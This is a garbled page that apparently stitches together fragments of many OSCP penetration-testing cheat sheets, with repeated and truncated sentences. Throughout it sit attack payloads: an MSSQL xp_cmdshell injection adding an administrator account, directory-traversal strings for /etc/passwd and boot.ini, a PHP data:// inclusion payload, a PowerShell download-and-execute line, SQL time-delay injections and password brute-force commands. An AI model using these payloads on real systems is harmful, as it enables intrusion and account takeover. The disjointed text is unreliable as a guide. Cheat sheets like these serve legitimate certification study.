The difference in this blog is that I have focused more on service level enumeration and privilege escalation.Cybersecurity folks especially penetration testers would know what is the OSCP challenge. That being said - it is far from an exhaustive list. pwn script to bruteforce. Day 7 (9/05/2018) Section 4.3: SMB Enumeration / 4.4: SMTP Enumeration / 4.5 SNMP Enumeration PWK Readings: 120-133 PWK Videos: 39-48 PowerView … Need to check everything carefully! Checks. After getting shell, we may need to upload additional files or stable backdoor. This nc command can be very useful to check egress filtering -> see below User enumeration; Command execution; HTTP - HTTPS - 80 - 443. . Check if you can … File Inclusion; SQL Injection 0x01 - Introduction; SQL Injection 0x02 - Testing & UNION Attacks ; SQL Injection 0x03 - Blind Boolean Attacks; SQL Injection Cheatsheet; Active Directory. We need to know what users have privileges. Without enumeration, we will have hard time to exploit the target. General PowerShell AMSI Bypass. Additional Review: Subdomain Enumeration, DNSRecon, DNSenum options, Experimentation with Nmap Grep-able output, NMAP Cheat Sheet, Researching popular NSE scripts for Nmap. Try Local Port Forwarding: No SSH Access but limited shell? FTP (21/tcp) SSH (22/tcp) SMTP (25/tcp) DNS (53/tcp) RPC / NFS (111/tcp) S(a)MB(a) (139/tcp and 445/tcp) SNMP (161/udp) HTTP(S) (80/tcp, 443/tcp, 8000/tcp, 8080/tcp, 8443/tcp, …) Searchsploit; All-in-one; Exploitation. Here are some of my notes I gathered while in the lab and for the exam preparation. Red Teaming Experiments. Nmap. May need to find out the hidden parameters. View-Source of pages to find interesting comments, directories, technologies, web application being used, etc.. Finding hidden content Scanning each sub-domain and interesting directory is a good idea Exploitation helper tools. Just another OSCP cheat sheet. Good Luck and Try Harder - akenofu/OSCP-Cheat-Sheet Introduction. ... Meterpreter cheat sheet. If nothing work, Find different exploit! Main Tools. My OSCP notes. We should request invalid file and see if any error is displayed! Buffer overflow. OSCP notes OSCP notes OSCP notes OSCP notes. MISC. Upload plink and Try Remote port forward with plink. Powered by GitBook. 12/30/12 A nice OSCP cheat sheet | 7/12 Look for known vulnerable services (refer nmap/zenmap output) Check versions of software (by either snmp enumeration or nmap/zenmap) against or or Compile exploit code if possible (milw0rm archive) cd /pentest/exploits/milw0rm cat sploitlist.txt | grep -i [exploit] cat sploitlist.txt | grep -i [exploit] Some exploits may be written for compilation … Fortunately some people have already put in a lot of great work in creating these when it comes to OSCP and penetration testing as a whole. I can proudly say it helped me pass so I hope it can help you as well ! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --, ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd, ../../../../../../../../../../etc/passwd%00, ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500, ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini, ../../../../../../../../../../boot.ini%00, ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500, ../../../../../../../../../../windows/system32/drivers/etc/hosts, ../../../../../../../../../../windows/system32/drivers/etc/hosts%00, ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts, ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500,, http://x.x.x.x/blah?parameter=expect://whoami, http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==, # the base64 encoded payload is: SMB enumeration: This is what you might come across pretty often. Also we should search for default credential online! CheatSheet (Short) slyth11907/Cheatsheets . If one method fail, another should be tested. There is a big chance getting sensitive information with SMB. Pinned. Code … Check if you can upload a file to trigger a webshell through the webapp. These payload copied from:, CheatSheet:MSSQL INJECTION: INJECTION: Gaining access. For example: Sometime we need to do password guessing(We should!). Structured in a way which make sense to me and maybe will to you … Here is my OSCP cheatsheet that I’ve made for myself throughout the nightly lab sessions. pwn script to bruteforce. There are multiples infosec guys who has written blogs related to these machines for community. So, in this post I'll be sharing my notes as well as few important takeaways which I feel it will help every beginner just like me! Try Removing additional space. Web Directory Enumeration. OSCP Goldmine (not clickbait) | 0xc0ffee☕ My OSCP Diary – Week 1 – Threat Week; GitHub – areyou1or0/OSCP: OSCP; abatchy’s blog | How … P3t3rp4rk3r / OSCP-cheat-sheet-1. Have SSH access with low privileges? Uploaded in GitHub: Default Username: Default Password: Hack OSCP; OSCP Journey; Ultimate Cheatsheet; Escaping Jailed Shells; Windows Privilege Escalation; Linux Privilege Escalation; Win 32-Bit Buffer Overflow; Web Exploitation. Hackthebox machines and Vulnhub Machines. Transferring files. g0tmi1k - Basic Linux Privilege Escalation LDAP and kerberos. PrivEsc - Windows. Check if it has any proxy related vulnerability. Username enumeration In /user/register just try to create a username and if the name is already taken it will be notified : *The name admin is already taken* If you request a new password for an existing username : *Unable to send e-mail. SMB null session is available for SMB1 systems only i.e 2000,xp,2003 Directory, Sensitive files brute force and spider any discovered directory. What patches/hotfixes the system has. Privilege escalation. The aim of this cheat sheet is to give you a quick overview of possible attack vectors that can be used to elevate your privileges to system and is based on the mind map below. There are already a lot of good blogs available online for the same, so I would just wrap up the things with useful PowerView commands which can be used as a cheat-sheet while doing Red Team assessment or working in your OSCP Labs. Found NFS and ProFtpd 1.3.5 is running. Hacking/OSCP Cheatsheet Well, just finished my 90 days journey of OSCP labs, so now here is my cheatsheet of it (and of hacking itself), I will be adding stuff in an incremental way as I go having time and/or learning new stuff. SMB enumeration: This is what you might come across pretty often. First start TCPdump at your own box, Run at target (where x.x.x.x is your attacking box), nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x, powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Portscan -Hosts x.x.x.x",, gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20, gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20, gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php, wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ, wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ, nmap --script=smb-check-vulns.nse x.x.x.x, smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor, mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt. Before diving into the different attack vectors, I listed some commands … Improving your hands-on skills will play a huge key role when you are tackling these machines. Misc. Recon (Scanning & Enumeration) Web Application. Some screenshot from burp suit: To brute force web form with the hydra, we need to grab the post data from the burp suite carefully. I will not cover all the basics here as it may lead to a complete separate blog series. Tooling. After posting this on Linkedin, I got tons of messages from people asking me about tips and what are my thoughts on OSCP exam. All finding should be noted for future reference. Tools. GitHub is home to over 50 million developers working together to host and review code, manage projects, and build software together. Cheat sheet series. Otherwise, we will get false positive and waste lots of time! OSCP personal cheatsheet . For example, if we have a url that end with This is for the people who are aiming to grow in the domain of Penetration testing. Directory Traversal and (Local) File … Also some weird port is open? Misc. About the SQL Injection Cheat Sheet. Edit Target address, Reverse connection ip and Ports. Hope is helpfull for you! Send our malicious code using CURL or Burpsuite or even netcat: If found any parameters or input fields, we can try for command execution. I was initially going to compile a list of resources I use frequently into sort of a wiki/cheat sheet, but finding that others have already done a lot of this hard work for me I will just go ahead and plug a list here: Passing OSCP – Long list of common enumeration methods, shells, frequently used payloads, file transfer methods, PrivEsc resources + script checkers, etc. Powered by GitBook. This is my OSCP cheat sheet made by combining a lot of different resources online with a little bit of tweaking. Red Team Infrastructure . All enumeration previously should be noted! Note: I tried to highlight some poor OpSec choices for typical red teaming engagements with . I would like to make my own cheatsheet for the exam. Post exploitation. Good Luck and Try Harder . We may get the warning, but it should work! Buffer Overflow. Just some oscp cheat sheet stuff that I customized for myself. About the Author. Search Vulnerability with identified info. Quick Initial Foothold in 10 HTB Machine! personal; May 25, 2019; Here is my OSCP cheatsheet that I’ve made for myself throughout the … Student Notes and Guides. OSCP Notes – Enumeration OSCP Notes – Metasploit OSCP Notes – Password attacks OSCP Notes – Pivoting OSCP Notes – Shell and Linux / UNIX OSCP Notes – Web Exploitation OSCP Notes – Windows. LDAP and kerberos. Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- ENUMERATING SERVICES – PART 2 Standard Record Enumeration. Full TCP nmap; UDP nmap; Enumeration. This SQL injection cheat sheet was originally published in 2007 by Ferruh Mavituna on his blog. There are two main websites for practice on vulnerable machines. linkedin. Overview: Enum4linux is a tool for enumerating information from Windows and Samba systems. File Inclusion; SQL Injection 0x01 - Introduction; SQL Injection 0x02 - Testing & UNION Attacks ; SQL Injection 0x03 - Blind Boolean Attacks; SQL Injection Cheatsheet; Active Directory. After mounting the filesystem if don’t have read/write permission, we need to edit /etc/passwd and change UUID: Now we can write files to the target fold of the network filesystem. OSCP journey with Liodeus ! Feel free to collaborate. Discover valid usernames by brute force querying possible usernames against a Kerberos service (source:, nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x, wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10, Use time delays to find injectable parameter, SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/. Exploitation helper tools. The control … Hacking/OSCP Cheatsheet Well, just finished my 90 days journey of OSCP labs, so now here is my cheatsheet of it (and of hacking itself), I will be adding stuff in an incremental way as I go having time and/or learning new stuff. Dynamic Port Forwarding from victim machine(Socks Proxy): With Dynamic Port Forwarding We can access/browse any ip range of the victim machine. @spotheplanet. Not your standard OSCP guide. We just need to configure proxychains.conf as follows: Now we can use any application through proxychains… such as: Remote Port Forwarding using Plink. I would like to make my own cheatsheet for the exam. Tools. Fortunately some people have already put in a lot of great work in creating these when it comes to OSCP and penetration testing as a whole. Check if you have anonymous access. 21 - FTP. For each attack vector it explains how to detect whether a system is vulnerable and gives you an example on how to exploit it. Shells. Powered by GitBook. Tools. Identify Technology. 12/30/12 A nice OSCP cheat sheet | 7/12 Look for known vulnerable services (refer nmap/zenmap output) Check versions of software (by either snmp enumeration or nmap/zenmap) against or or Compile exploit code if possible (milw0rm archive) cd /pentest/exploits/milw0rm cat sploitlist.txt | grep -i [exploit] cat sploitlist.txt | grep -i [exploit] Some exploits may be written for compilation … #cheat sheet for OSCP. Brute force; CVE-2008-0166; SSH backdoor - post exploitation; DNS - 53. #Get Windows Version systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get patch Information wmic qfe get Caption, Description, HotFixID, InstalledOn #Get current username whoami #Get groups and permission information whoami username /all #get user … For each attack vector it explains how to detect whether a system is vulnerable and gives you an example on how to exploit it. A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. Target Specification Switch Example Description nmap Scan a single IP nmap Scan specific IPs nmap Scan a range nmap Scan a domain nmap Scan using CIDR notation -iL nmap -iL targets.txt Scan targets from a file -iR nmap -iR 100 Scan 100 random hosts --exclude nmap - … SQL Injection & XSS Playground. OSCP. I will likely have missed some though, so, understand what you are running before you run it! Priv Escalation. So, I directly jumped to the lab machines. OSCP Study material. We need to enumerate for basic information before attempting to escalate privilege. Useful for brute forcing. FTP version is vulnerable. offensive-exploitation. I used this cheat sheet during my exam (Fri, 13 Sep 2019) and during the labs. Created by potrace 1.11, written by Peter Selinger 2001-2013 John Tuyen. Brute force; Downloading file; Uploading file ; SSH - 22. My OSCP notes. Post Exploitation. OSCP notes OSCP notes OSCP notes OSCP notes. Filter all open ports for nmap script scanning: Download:, Enumerate Using netcat. PowerView … Gaining access. Zone Transfer. The aim of this cheat sheet is to give you a quick overview of possible attack vectors that can be used to elevate your privileges to system and is based on the mind map below. pwn script to … Student Notes and Guides. Updated May 18th, 2020 Since my OSCP certification exam is coming up, I decided to do a writeup of the commands and techniques I have most frequently used in the PWK labs and in similar machines. Convenient commands for your pentesting / red-teaming engagements, OSCP and CTFs. All finding should be noted for future reference. Reconnaissance & enumeration. Updated December 6th, 2020 Since I recently completed my CRTP and CRTE exams, I decided to compile a list of my most-used techniques and commands for Microsoft Windows and Active Directory (post-)exploitation. Good Luck and Try Harder - akenofu/OSCP-Cheat-Sheet Contribute to brcyrr/OSCP development by creating an account on GitHub. Now move to vulnerable machines. Pentesting Cheatsheets. Reverse Lookup. OSCP – Detail Guide to Stack-based buffer Overflow – 1; OSCP – Detail Guide to … Initial Access. My OSCP notes. Having cheat sheets can be invaluable. This is my OSCP cheat sheet made by combining a lot of different resources online with a little bit of tweaking. But this is basically the tools I tend to relie and use in this way the most. Tips #1: Always read more writeups! OSCP notes OSCP notes OSCP notes. Nmap. If the URL parameter has file name, we can try to vulnerability for LFI/RFI. A starting point for different cheat sheets that may be of value can be found below: Privilege Escalation. Enumeration Network discoverie Nmap I tend to run 3 nmaps, … A starting point for different cheat sheets that may be of value can be found below: Privilege Escalation. OSCP- One Page Repository. #enum4linux -U //-U will get userlist SMB null session is an unauthenticated netbios session between two computers. There are multiples infosec guys who has written blogs related to these machines for community. Lateral movement. EXEC sp_configure 'show advanced options', 1; ';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --, ';exec master..xp_cmdshell 'net user hodor Qwerty123!
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